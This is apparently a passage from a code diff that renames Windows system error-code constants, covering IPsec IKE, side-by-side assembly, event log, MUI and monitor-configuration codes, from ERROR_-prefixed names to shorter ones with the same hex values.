ERROR_IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F - ERROR_IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 - ERROR_IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 - ERROR_IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 - ERROR_IPSEC_IKE_INVALID_PAYLOAD = 0x3613 - ERROR_IPSEC_IKE_LOAD_SOFT_SA = 0x3614 - ERROR_IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 - ERROR_IPSEC_IKE_INVALID_COOKIE = 0x3616 - ERROR_IPSEC_IKE_NO_PEER_CERT = 0x3617 - ERROR_IPSEC_IKE_PEER_CRL_FAILED = 0x3618 - ERROR_IPSEC_IKE_POLICY_CHANGE = 0x3619 - ERROR_IPSEC_IKE_NO_MM_POLICY = 0x361A - ERROR_IPSEC_IKE_NOTCBPRIV = 0x361B - ERROR_IPSEC_IKE_SECLOADFAIL = 0x361C - ERROR_IPSEC_IKE_FAILSSPINIT = 0x361D - ERROR_IPSEC_IKE_FAILQUERYSSP = 0x361E - ERROR_IPSEC_IKE_SRVACQFAIL = 0x361F - ERROR_IPSEC_IKE_SRVQUERYCRED = 0x3620 - ERROR_IPSEC_IKE_GETSPIFAIL = 0x3621 - ERROR_IPSEC_IKE_INVALID_FILTER = 0x3622 - ERROR_IPSEC_IKE_OUT_OF_MEMORY = 0x3623 - ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 - ERROR_IPSEC_IKE_INVALID_POLICY = 0x3625 - ERROR_IPSEC_IKE_UNKNOWN_DOI = 0x3626 - ERROR_IPSEC_IKE_INVALID_SITUATION = 0x3627 - ERROR_IPSEC_IKE_DH_FAILURE = 0x3628 - ERROR_IPSEC_IKE_INVALID_GROUP = 0x3629 - ERROR_IPSEC_IKE_ENCRYPT = 0x362A - ERROR_IPSEC_IKE_DECRYPT = 0x362B - ERROR_IPSEC_IKE_POLICY_MATCH = 0x362C - ERROR_IPSEC_IKE_UNSUPPORTED_ID = 0x362D - ERROR_IPSEC_IKE_INVALID_HASH = 0x362E - ERROR_IPSEC_IKE_INVALID_HASH_ALG = 0x362F - ERROR_IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 - ERROR_IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 - ERROR_IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 - ERROR_IPSEC_IKE_INVALID_SIG = 0x3633 - ERROR_IPSEC_IKE_LOAD_FAILED = 0x3634 - ERROR_IPSEC_IKE_RPC_DELETE = 0x3635 - ERROR_IPSEC_IKE_BENIGN_REINIT = 0x3636 - ERROR_IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 - ERROR_IPSEC_IKE_QM_LIMIT_REAP = 0x3638 - ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 - ERROR_IPSEC_IKE_MM_LIMIT = 0x363A - ERROR_IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B - ERROR_IPSEC_IKE_QM_LIMIT = 0x363C - ERROR_IPSEC_IKE_MM_EXPIRED = 0x363D - ERROR_IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E - ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F - ERROR_IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 - ERROR_IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 - ERROR_IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 - ERROR_IPSEC_IKE_SHUTTING_DOWN = 0x3643 - ERROR_IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 - ERROR_IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 - ERROR_IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 - ERROR_IPSEC_IKE_QM_EXPIRED = 0x3647 - ERROR_IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 - ERROR_IPSEC_IKE_NEG_STATUS_END = 0x3649 - ERROR_IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A - ERROR_IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B - ERROR_IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C - ERROR_IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D - ERROR_IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E - ERROR_IPSEC_IKE_RATELIMIT_DROP = 0x364F - ERROR_IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 - ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 - ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 - ERROR_IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 - ERROR_IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 - ERROR_IPSEC_BAD_SPI = 0x3656 - ERROR_IPSEC_SA_LIFETIME_EXPIRED = 0x3657 - ERROR_IPSEC_WRONG_SA = 0x3658 - ERROR_IPSEC_REPLAY_CHECK_FAILED = 0x3659 - ERROR_IPSEC_INVALID_PACKET = 0x365A - ERROR_IPSEC_INTEGRITY_CHECK_FAILED = 0x365B - ERROR_IPSEC_CLEAR_TEXT_DROP = 0x365C - ERROR_IPSEC_AUTH_FIREWALL_DROP = 0x365D - ERROR_IPSEC_THROTTLE_DROP = 0x365E - ERROR_IPSEC_DOSP_BLOCK = 0x3665 - ERROR_IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 - ERROR_IPSEC_DOSP_INVALID_PACKET = 0x3667 - ERROR_IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 - ERROR_IPSEC_DOSP_MAX_ENTRIES = 0x3669 - ERROR_IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A - ERROR_IPSEC_DOSP_NOT_INSTALLED = 0x366B - ERROR_IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C - ERROR_SXS_SECTION_NOT_FOUND = 0x36B0 - ERROR_SXS_CANT_GEN_ACTCTX = 0x36B1 - ERROR_SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 - ERROR_SXS_ASSEMBLY_NOT_FOUND = 0x36B3 - ERROR_SXS_MANIFEST_FORMAT_ERROR = 0x36B4 - ERROR_SXS_MANIFEST_PARSE_ERROR = 0x36B5 - ERROR_SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 - ERROR_SXS_KEY_NOT_FOUND = 0x36B7 - ERROR_SXS_VERSION_CONFLICT = 0x36B8 - ERROR_SXS_WRONG_SECTION_TYPE = 0x36B9 - ERROR_SXS_THREAD_QUERIES_DISABLED = 0x36BA - ERROR_SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB - ERROR_SXS_UNKNOWN_ENCODING_GROUP = 0x36BC - ERROR_SXS_UNKNOWN_ENCODING = 0x36BD - ERROR_SXS_INVALID_XML_NAMESPACE_URI = 0x36BE - ERROR_SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF - ERROR_SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 - ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 - ERROR_SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 - ERROR_SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 - ERROR_SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 - ERROR_SXS_DUPLICATE_DLL_NAME = 0x36C5 - ERROR_SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 - ERROR_SXS_DUPLICATE_CLSID = 0x36C7 - ERROR_SXS_DUPLICATE_IID = 0x36C8 - ERROR_SXS_DUPLICATE_TLBID = 0x36C9 - ERROR_SXS_DUPLICATE_PROGID = 0x36CA - ERROR_SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB - ERROR_SXS_FILE_HASH_MISMATCH = 0x36CC - ERROR_SXS_POLICY_PARSE_ERROR = 0x36CD - ERROR_SXS_XML_E_MISSINGQUOTE = 0x36CE - ERROR_SXS_XML_E_COMMENTSYNTAX = 0x36CF - ERROR_SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 - ERROR_SXS_XML_E_BADNAMECHAR = 0x36D1 - ERROR_SXS_XML_E_BADCHARINSTRING = 0x36D2 - ERROR_SXS_XML_E_XMLDECLSYNTAX = 0x36D3 - ERROR_SXS_XML_E_BADCHARDATA = 0x36D4 - ERROR_SXS_XML_E_MISSINGWHITESPACE = 0x36D5 - ERROR_SXS_XML_E_EXPECTINGTAGEND = 0x36D6 - ERROR_SXS_XML_E_MISSINGSEMICOLON = 0x36D7 - ERROR_SXS_XML_E_UNBALANCEDPAREN = 0x36D8 - ERROR_SXS_XML_E_INTERNALERROR = 0x36D9 - ERROR_SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA - ERROR_SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB - ERROR_SXS_XML_E_MISSING_PAREN = 0x36DC - ERROR_SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD - ERROR_SXS_XML_E_MULTIPLE_COLONS = 0x36DE - ERROR_SXS_XML_E_INVALID_DECIMAL = 0x36DF - ERROR_SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 - ERROR_SXS_XML_E_INVALID_UNICODE = 0x36E1 - ERROR_SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 - ERROR_SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 - ERROR_SXS_XML_E_UNCLOSEDTAG = 0x36E4 - ERROR_SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 - ERROR_SXS_XML_E_MULTIPLEROOTS = 0x36E6 - ERROR_SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 - ERROR_SXS_XML_E_BADXMLDECL = 0x36E8 - ERROR_SXS_XML_E_MISSINGROOT = 0x36E9 - ERROR_SXS_XML_E_UNEXPECTEDEOF = 0x36EA - ERROR_SXS_XML_E_BADPEREFINSUBSET = 0x36EB - ERROR_SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC - ERROR_SXS_XML_E_UNCLOSEDENDTAG = 0x36ED - ERROR_SXS_XML_E_UNCLOSEDSTRING = 0x36EE - ERROR_SXS_XML_E_UNCLOSEDCOMMENT = 0x36EF - ERROR_SXS_XML_E_UNCLOSEDDECL = 0x36F0 - ERROR_SXS_XML_E_UNCLOSEDCDATA = 0x36F1 - ERROR_SXS_XML_E_RESERVEDNAMESPACE = 0x36F2 - ERROR_SXS_XML_E_INVALIDENCODING = 0x36F3 - ERROR_SXS_XML_E_INVALIDSWITCH = 0x36F4 - ERROR_SXS_XML_E_BADXMLCASE = 0x36F5 - ERROR_SXS_XML_E_INVALID_STANDALONE = 0x36F6 - ERROR_SXS_XML_E_UNEXPECTED_STANDALONE = 0x36F7 - ERROR_SXS_XML_E_INVALID_VERSION = 0x36F8 - ERROR_SXS_XML_E_MISSINGEQUALS = 0x36F9 - ERROR_SXS_PROTECTION_RECOVERY_FAILED = 0x36FA - ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT = 0x36FB - ERROR_SXS_PROTECTION_CATALOG_NOT_VALID = 0x36FC - ERROR_SXS_UNTRANSLATABLE_HRESULT = 0x36FD - ERROR_SXS_PROTECTION_CATALOG_FILE_MISSING = 0x36FE - ERROR_SXS_MISSING_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36FF - ERROR_SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE_NAME = 0x3700 - ERROR_SXS_ASSEMBLY_MISSING = 0x3701 - ERROR_SXS_CORRUPT_ACTIVATION_STACK = 0x3702 - ERROR_SXS_CORRUPTION = 0x3703 - ERROR_SXS_EARLY_DEACTIVATION = 0x3704 - ERROR_SXS_INVALID_DEACTIVATION = 0x3705 - ERROR_SXS_MULTIPLE_DEACTIVATION = 0x3706 - ERROR_SXS_PROCESS_TERMINATION_REQUESTED = 0x3707 - ERROR_SXS_RELEASE_ACTIVATION_CONTEXT = 0x3708 - ERROR_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY = 0x3709 - ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE = 0x370A - ERROR_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME = 0x370B - ERROR_SXS_IDENTITY_DUPLICATE_ATTRIBUTE = 0x370C - ERROR_SXS_IDENTITY_PARSE_ERROR = 0x370D - ERROR_MALFORMED_SUBSTITUTION_STRING = 0x370E - ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN = 0x370F - ERROR_UNMAPPED_SUBSTITUTION_STRING = 0x3710 - ERROR_SXS_ASSEMBLY_NOT_LOCKED = 0x3711 - ERROR_SXS_COMPONENT_STORE_CORRUPT = 0x3712 - ERROR_ADVANCED_INSTALLER_FAILED = 0x3713 - ERROR_XML_ENCODING_MISMATCH = 0x3714 - ERROR_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT = 0x3715 - ERROR_SXS_IDENTITIES_DIFFERENT = 0x3716 - ERROR_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT = 0x3717 - ERROR_SXS_FILE_NOT_PART_OF_ASSEMBLY = 0x3718 - ERROR_SXS_MANIFEST_TOO_BIG = 0x3719 - ERROR_SXS_SETTING_NOT_REGISTERED = 0x371A - ERROR_SXS_TRANSACTION_CLOSURE_INCOMPLETE = 0x371B - ERROR_SMI_PRIMITIVE_INSTALLER_FAILED = 0x371C - ERROR_GENERIC_COMMAND_FAILED = 0x371D - ERROR_SXS_FILE_HASH_MISSING = 0x371E - ERROR_EVT_INVALID_CHANNEL_PATH = 0x3A98 - ERROR_EVT_INVALID_QUERY = 0x3A99 - ERROR_EVT_PUBLISHER_METADATA_NOT_FOUND = 0x3A9A - ERROR_EVT_EVENT_TEMPLATE_NOT_FOUND = 0x3A9B - ERROR_EVT_INVALID_PUBLISHER_NAME = 0x3A9C - ERROR_EVT_INVALID_EVENT_DATA = 0x3A9D - ERROR_EVT_CHANNEL_NOT_FOUND = 0x3A9F - ERROR_EVT_MALFORMED_XML_TEXT = 0x3AA0 - ERROR_EVT_SUBSCRIPTION_TO_DIRECT_CHANNEL = 0x3AA1 - ERROR_EVT_CONFIGURATION_ERROR = 0x3AA2 - ERROR_EVT_QUERY_RESULT_STALE = 0x3AA3 - ERROR_EVT_QUERY_RESULT_INVALID_POSITION = 0x3AA4 - ERROR_EVT_NON_VALIDATING_MSXML = 0x3AA5 - ERROR_EVT_FILTER_ALREADYSCOPED = 0x3AA6 - ERROR_EVT_FILTER_NOTELTSET = 0x3AA7 - ERROR_EVT_FILTER_INVARG = 0x3AA8 - ERROR_EVT_FILTER_INVTEST = 0x3AA9 - ERROR_EVT_FILTER_INVTYPE = 0x3AAA - ERROR_EVT_FILTER_PARSEERR = 0x3AAB - ERROR_EVT_FILTER_UNSUPPORTEDOP = 0x3AAC - ERROR_EVT_FILTER_UNEXPECTEDTOKEN = 0x3AAD - ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL = 0x3AAE - ERROR_EVT_INVALID_CHANNEL_PROPERTY_VALUE = 0x3AAF - ERROR_EVT_INVALID_PUBLISHER_PROPERTY_VALUE = 0x3AB0 - ERROR_EVT_CHANNEL_CANNOT_ACTIVATE = 0x3AB1 - ERROR_EVT_FILTER_TOO_COMPLEX = 0x3AB2 - ERROR_EVT_MESSAGE_NOT_FOUND = 0x3AB3 - ERROR_EVT_MESSAGE_ID_NOT_FOUND = 0x3AB4 - ERROR_EVT_UNRESOLVED_VALUE_INSERT = 0x3AB5 - ERROR_EVT_UNRESOLVED_PARAMETER_INSERT = 0x3AB6 - ERROR_EVT_MAX_INSERTS_REACHED = 0x3AB7 - ERROR_EVT_EVENT_DEFINITION_NOT_FOUND = 0x3AB8 - ERROR_EVT_MESSAGE_LOCALE_NOT_FOUND = 0x3AB9 - ERROR_EVT_VERSION_TOO_OLD = 0x3ABA - ERROR_EVT_VERSION_TOO_NEW = 0x3ABB - ERROR_EVT_CANNOT_OPEN_CHANNEL_OF_QUERY = 0x3ABC - ERROR_EVT_PUBLISHER_DISABLED = 0x3ABD - ERROR_EVT_FILTER_OUT_OF_RANGE = 0x3ABE - ERROR_EC_SUBSCRIPTION_CANNOT_ACTIVATE = 0x3AE8 - ERROR_EC_LOG_DISABLED = 0x3AE9 - ERROR_EC_CIRCULAR_FORWARDING = 0x3AEA - ERROR_EC_CREDSTORE_FULL = 0x3AEB - ERROR_EC_CRED_NOT_FOUND = 0x3AEC - ERROR_EC_NO_ACTIVE_CHANNEL = 0x3AED - ERROR_MUI_FILE_NOT_FOUND = 0x3AFC - ERROR_MUI_INVALID_FILE = 0x3AFD - ERROR_MUI_INVALID_RC_CONFIG = 0x3AFE - ERROR_MUI_INVALID_LOCALE_NAME = 0x3AFF - ERROR_MUI_INVALID_ULTIMATEFALLBACK_NAME = 0x3B00 - ERROR_MUI_FILE_NOT_LOADED = 0x3B01 - ERROR_RESOURCE_ENUM_USER_STOP = 0x3B02 - ERROR_MUI_INTLSETTINGS_UILANG_NOT_INSTALLED = 0x3B03 - ERROR_MUI_INTLSETTINGS_INVALID_LOCALE_NAME = 0x3B04 - ERROR_MCA_INVALID_CAPABILITIES_STRING = 0x3B60 - ERROR_MCA_INVALID_VCP_VERSION = 0x3B61 - ERROR_MCA_MONITOR_VIOLATES_MCCS_SPECIFICATION = 0x3B62 - ERROR_MCA_MCCS_VERSION_MISMATCH = 0x3B63 - ERROR_MCA_UNSUPPORTED_MCCS_VERSION = 0x3B64 - ERROR_MCA_INTERNAL_ERROR = 0x3B65 - ERROR_MCA_INVALID_TECHNOLOGY_TYPE_RETURNED = 0x3B66 - ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE = 0x3B67 - ERROR_AMBIGUOUS_SYSTEM_DEVICE = 0x3B92 - ERROR_SYSTEM_DEVICE_NOT_FOUND = 0x3BC3 - ERROR_HASH_NOT_SUPPORTED = 0x3BC4 - ERROR_HASH_NOT_PRESENT = 0x3BC5 + IPSEC_IKE_AUTH_FAIL = 0x35E9 + IPSEC_IKE_ATTRIB_FAIL = 0x35EA + IPSEC_IKE_NEGOTIATION_PENDING = 0x35EB + IPSEC_IKE_GENERAL_PROCESSING_ERROR = 0x35EC + IPSEC_IKE_TIMED_OUT = 0x35ED + IPSEC_IKE_NO_CERT = 0x35EE + IPSEC_IKE_SA_DELETED = 0x35EF + IPSEC_IKE_SA_REAPED = 0x35F0 + IPSEC_IKE_MM_ACQUIRE_DROP = 0x35F1 + IPSEC_IKE_QM_ACQUIRE_DROP = 0x35F2 + IPSEC_IKE_QUEUE_DROP_MM = 0x35F3 + IPSEC_IKE_QUEUE_DROP_NO_MM = 0x35F4 + IPSEC_IKE_DROP_NO_RESPONSE = 0x35F5 + IPSEC_IKE_MM_DELAY_DROP = 0x35F6 + IPSEC_IKE_QM_DELAY_DROP = 0x35F7 + IPSEC_IKE_ERROR = 0x35F8 + IPSEC_IKE_CRL_FAILED = 0x35F9 + IPSEC_IKE_INVALID_KEY_USAGE = 0x35FA + IPSEC_IKE_INVALID_CERT_TYPE = 0x35FB + IPSEC_IKE_NO_PRIVATE_KEY = 0x35FC + IPSEC_IKE_DH_FAIL = 0x35FE + IPSEC_IKE_CRITICAL_PAYLOAD_NOT_RECOGNIZED = 0x35FF + IPSEC_IKE_INVALID_HEADER = 0x3600 + IPSEC_IKE_NO_POLICY = 0x3601 + IPSEC_IKE_INVALID_SIGNATURE = 0x3602 + IPSEC_IKE_KERBEROS_ERROR = 0x3603 + IPSEC_IKE_NO_PUBLIC_KEY = 0x3604 + IPSEC_IKE_PROCESS_ERR = 0x3605 + IPSEC_IKE_PROCESS_ERR_SA = 0x3606 + IPSEC_IKE_PROCESS_ERR_PROP = 0x3607 + IPSEC_IKE_PROCESS_ERR_TRANS = 0x3608 + IPSEC_IKE_PROCESS_ERR_KE = 0x3609 + IPSEC_IKE_PROCESS_ERR_ID = 0x360A + IPSEC_IKE_PROCESS_ERR_CERT = 0x360B + IPSEC_IKE_PROCESS_ERR_CERT_REQ = 0x360C + IPSEC_IKE_PROCESS_ERR_HASH = 0x360D + IPSEC_IKE_PROCESS_ERR_SIG = 0x360E + IPSEC_IKE_PROCESS_ERR_NONCE = 0x360F + IPSEC_IKE_PROCESS_ERR_NOTIFY = 0x3610 + IPSEC_IKE_PROCESS_ERR_DELETE = 0x3611 + IPSEC_IKE_PROCESS_ERR_VENDOR = 0x3612 + IPSEC_IKE_INVALID_PAYLOAD = 0x3613 + IPSEC_IKE_LOAD_SOFT_SA = 0x3614 + IPSEC_IKE_SOFT_SA_TORN_DOWN = 0x3615 + IPSEC_IKE_INVALID_COOKIE = 0x3616 + IPSEC_IKE_NO_PEER_CERT = 0x3617 + IPSEC_IKE_PEER_CRL_FAILED = 0x3618 + IPSEC_IKE_POLICY_CHANGE = 0x3619 + IPSEC_IKE_NO_MM_POLICY = 0x361A + IPSEC_IKE_NOTCBPRIV = 0x361B + IPSEC_IKE_SECLOADFAIL = 0x361C + IPSEC_IKE_FAILSSPINIT = 0x361D + IPSEC_IKE_FAILQUERYSSP = 0x361E + IPSEC_IKE_SRVACQFAIL = 0x361F + IPSEC_IKE_SRVQUERYCRED = 0x3620 + IPSEC_IKE_GETSPIFAIL = 0x3621 + IPSEC_IKE_INVALID_FILTER = 0x3622 + IPSEC_IKE_OUT_OF_MEMORY = 0x3623 + IPSEC_IKE_ADD_UPDATE_KEY_FAILED = 0x3624 + IPSEC_IKE_INVALID_POLICY = 0x3625 + IPSEC_IKE_UNKNOWN_DOI = 0x3626 + IPSEC_IKE_INVALID_SITUATION = 0x3627 + IPSEC_IKE_DH_FAILURE = 0x3628 + IPSEC_IKE_INVALID_GROUP = 0x3629 + IPSEC_IKE_ENCRYPT = 0x362A + IPSEC_IKE_DECRYPT = 0x362B + IPSEC_IKE_POLICY_MATCH = 0x362C + IPSEC_IKE_UNSUPPORTED_ID = 0x362D + IPSEC_IKE_INVALID_HASH = 0x362E + IPSEC_IKE_INVALID_HASH_ALG = 0x362F + IPSEC_IKE_INVALID_HASH_SIZE = 0x3630 + IPSEC_IKE_INVALID_ENCRYPT_ALG = 0x3631 + IPSEC_IKE_INVALID_AUTH_ALG = 0x3632 + IPSEC_IKE_INVALID_SIG = 0x3633 + IPSEC_IKE_LOAD_FAILED = 0x3634 + IPSEC_IKE_RPC_DELETE = 0x3635 + IPSEC_IKE_BENIGN_REINIT = 0x3636 + IPSEC_IKE_INVALID_RESPONDER_LIFETIME_NOTIFY = 0x3637 + IPSEC_IKE_QM_LIMIT_REAP = 0x3638 + IPSEC_IKE_INVALID_CERT_KEYLEN = 0x3639 + IPSEC_IKE_MM_LIMIT = 0x363A + IPSEC_IKE_NEGOTIATION_DISABLED = 0x363B + IPSEC_IKE_QM_LIMIT = 0x363C + IPSEC_IKE_MM_EXPIRED = 0x363D + IPSEC_IKE_PEER_MM_ASSUMED_INVALID = 0x363E + IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH = 0x363F + IPSEC_IKE_UNEXPECTED_MESSAGE_ID = 0x3640 + IPSEC_IKE_INVALID_AUTH_PAYLOAD = 0x3641 + IPSEC_IKE_DOS_COOKIE_SENT = 0x3642 + IPSEC_IKE_SHUTTING_DOWN = 0x3643 + IPSEC_IKE_CGA_AUTH_FAILED = 0x3644 + IPSEC_IKE_PROCESS_ERR_NATOA = 0x3645 + IPSEC_IKE_INVALID_MM_FOR_QM = 0x3646 + IPSEC_IKE_QM_EXPIRED = 0x3647 + IPSEC_IKE_TOO_MANY_FILTERS = 0x3648 + IPSEC_IKE_NEG_STATUS_END = 0x3649 + IPSEC_IKE_KILL_DUMMY_NAP_TUNNEL = 0x364A + IPSEC_IKE_INNER_IP_ASSIGNMENT_FAILURE = 0x364B + IPSEC_IKE_REQUIRE_CP_PAYLOAD_MISSING = 0x364C + IPSEC_KEY_MODULE_IMPERSONATION_NEGOTIATION_PENDING = 0x364D + IPSEC_IKE_COEXISTENCE_SUPPRESS = 0x364E + IPSEC_IKE_RATELIMIT_DROP = 0x364F + IPSEC_IKE_PEER_DOESNT_SUPPORT_MOBIKE = 0x3650 + IPSEC_IKE_AUTHORIZATION_FAILURE = 0x3651 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_FAILURE = 0x3652 + IPSEC_IKE_AUTHORIZATION_FAILURE_WITH_OPTIONAL_RETRY = 0x3653 + IPSEC_IKE_STRONG_CRED_AUTHORIZATION_AND_CERTMAP_FAILURE = 0x3654 + IPSEC_BAD_SPI = 0x3656 + IPSEC_SA_LIFETIME_EXPIRED = 0x3657 + IPSEC_WRONG_SA = 0x3658 + IPSEC_REPLAY_CHECK_FAILED = 0x3659 + IPSEC_INVALID_PACKET = 0x365A + IPSEC_INTEGRITY_CHECK_FAILED = 0x365B + IPSEC_CLEAR_TEXT_DROP = 0x365C + IPSEC_AUTH_FIREWALL_DROP = 0x365D + IPSEC_THROTTLE_DROP = 0x365E + IPSEC_DOSP_BLOCK = 0x3665 + IPSEC_DOSP_RECEIVED_MULTICAST = 0x3666 + IPSEC_DOSP_INVALID_PACKET = 0x3667 + IPSEC_DOSP_STATE_LOOKUP_FAILED = 0x3668 + IPSEC_DOSP_MAX_ENTRIES = 0x3669 + IPSEC_DOSP_KEYMOD_NOT_ALLOWED = 0x366A + IPSEC_DOSP_NOT_INSTALLED = 0x366B + IPSEC_DOSP_MAX_PER_IP_RATELIMIT_QUEUES = 0x366C + SXS_SECTION_NOT_FOUND = 0x36B0 + SXS_CANT_GEN_ACTCTX = 0x36B1 + SXS_INVALID_ACTCTXDATA_FORMAT = 0x36B2 + SXS_ASSEMBLY_NOT_FOUND = 0x36B3 + SXS_MANIFEST_FORMAT_ERROR = 0x36B4 + SXS_MANIFEST_PARSE_ERROR = 0x36B5 + SXS_ACTIVATION_CONTEXT_DISABLED = 0x36B6 + SXS_KEY_NOT_FOUND = 0x36B7 + SXS_VERSION_CONFLICT = 0x36B8 + SXS_WRONG_SECTION_TYPE = 0x36B9 + SXS_THREAD_QUERIES_DISABLED = 0x36BA + SXS_PROCESS_DEFAULT_ALREADY_SET = 0x36BB + SXS_UNKNOWN_ENCODING_GROUP = 0x36BC + SXS_UNKNOWN_ENCODING = 0x36BD + SXS_INVALID_XML_NAMESPACE_URI = 0x36BE + SXS_ROOT_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36BF + SXS_LEAF_MANIFEST_DEPENDENCY_NOT_INSTALLED = 0x36C0 + SXS_INVALID_ASSEMBLY_IDENTITY_ATTRIBUTE = 0x36C1 + SXS_MANIFEST_MISSING_REQUIRED_DEFAULT_NAMESPACE = 0x36C2 + SXS_MANIFEST_INVALID_REQUIRED_DEFAULT_NAMESPACE = 0x36C3 + SXS_PRIVATE_MANIFEST_CROSS_PATH_WITH_REPARSE_POINT = 0x36C4 + SXS_DUPLICATE_DLL_NAME = 0x36C5 + SXS_DUPLICATE_WINDOWCLASS_NAME = 0x36C6 + SXS_DUPLICATE_CLSID = 0x36C7 + SXS_DUPLICATE_IID = 0x36C8 + SXS_DUPLICATE_TLBID = 0x36C9 + SXS_DUPLICATE_PROGID = 0x36CA + SXS_DUPLICATE_ASSEMBLY_NAME = 0x36CB + SXS_FILE_HASH_MISMATCH = 0x36CC + SXS_POLICY_PARSE_ERROR = 0x36CD + SXS_XML_E_MISSINGQUOTE = 0x36CE + SXS_XML_E_COMMENTSYNTAX = 0x36CF + SXS_XML_E_BADSTARTNAMECHAR = 0x36D0 + SXS_XML_E_BADNAMECHAR = 0x36D1 + SXS_XML_E_BADCHARINSTRING = 0x36D2 + SXS_XML_E_XMLDECLSYNTAX = 0x36D3 + SXS_XML_E_BADCHARDATA = 0x36D4 + SXS_XML_E_MISSINGWHITESPACE = 0x36D5 + SXS_XML_E_EXPECTINGTAGEND = 0x36D6 + SXS_XML_E_MISSINGSEMICOLON = 0x36D7 + SXS_XML_E_UNBALANCEDPAREN = 0x36D8 + SXS_XML_E_INTERNALERROR = 0x36D9 + SXS_XML_E_UNEXPECTED_WHITESPACE = 0x36DA + SXS_XML_E_INCOMPLETE_ENCODING = 0x36DB + SXS_XML_E_MISSING_PAREN = 0x36DC + SXS_XML_E_EXPECTINGCLOSEQUOTE = 0x36DD + SXS_XML_E_MULTIPLE_COLONS = 0x36DE + SXS_XML_E_INVALID_DECIMAL = 0x36DF + SXS_XML_E_INVALID_HEXIDECIMAL = 0x36E0 + SXS_XML_E_INVALID_UNICODE = 0x36E1 + SXS_XML_E_WHITESPACEORQUESTIONMARK = 0x36E2 + SXS_XML_E_UNEXPECTEDENDTAG = 0x36E3 + SXS_XML_E_UNCLOSEDTAG = 0x36E4 + SXS_XML_E_DUPLICATEATTRIBUTE = 0x36E5 + SXS_XML_E_MULTIPLEROOTS = 0x36E6 + SXS_XML_E_INVALIDATROOTLEVEL = 0x36E7 + SXS_XML_E_BADXMLDECL = 0x36E8 + SXS_XML_E_MISSINGROOT = 0x36E9 + SXS_XML_E_UNEXPECTEDEOF = 0x36EA + SXS_XML_E_BADPEREFINSUBSET = 0x36EB + SXS_XML_E_UNCLOSEDSTARTTAG = 0x36EC + SXS_XML_E_UNCLOSEDENDTAG = 0x36ED + SXS_XML_E_UNCLOSEDSTRING = 0x36EE + 